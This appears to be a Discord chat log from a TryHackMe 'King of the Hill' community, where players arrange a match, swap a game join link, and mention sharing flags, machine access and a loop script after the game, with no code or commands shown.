<@456226577798135808> email this to the koth email and Iβll forward it to Skidy
ok thx
sour vectorBOT
Gave +1 Rep to @short tusk
brazen cloud
Aye yeah let us know and we'll get this awful behaviour resolved
sour zealot
stiff egret
Random public match, starting in 23 minutes
fair adder
hey @stiff egret can u check dm please? :))
stiff egret
Just saw them, must've missed them
stiff egret
https://tryhackme.com/games/koth/join/797cec7084ce329d78b4e3ad
Hop in, 2 minutes remaining
3 remaining slots
static aspen
srry i have to update apt rq
fair adder
ye
fair adder
yeah
static aspen
i need to find 4 more flags
3*
f
whaaaa
you can mess with me but you cant beat me
idk maybe that was me by accident
maybe i chose too hard of a room for even me a bit srry
static aspen
welp srry we can try a easier room like shrek if you want to sometime
fair adder
of course
do you mind atleast sharing how you got machine access in dms after game?
curious
static aspen
sure
fair adder
thx
static aspen
hey btw @latent osprey when we're done can you show me your loop your using
latent osprey
hey btw <@!515546257163550721> when we're done can you show me your loop your us...
Yeah sure
static aspen
Yeah sure
its noice lol i was trying to make one in /tmp/loop.sh but it failed miserably
latent osprey
its noice lol i was trying to make one in /tmp/loop.sh but it failed miserably
Yep I saw that rn